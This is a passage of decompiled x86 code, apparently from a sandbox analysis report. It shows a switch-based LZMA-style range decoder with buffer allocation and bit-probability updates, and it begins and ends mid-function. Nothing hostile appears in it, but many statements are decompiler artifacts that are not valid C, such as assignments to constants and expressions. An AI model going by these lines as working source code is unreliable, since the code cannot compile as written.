											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
